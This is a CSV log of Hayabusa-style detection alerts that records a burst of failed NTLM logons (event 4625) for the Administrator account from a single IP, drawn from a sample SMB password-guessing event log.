2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
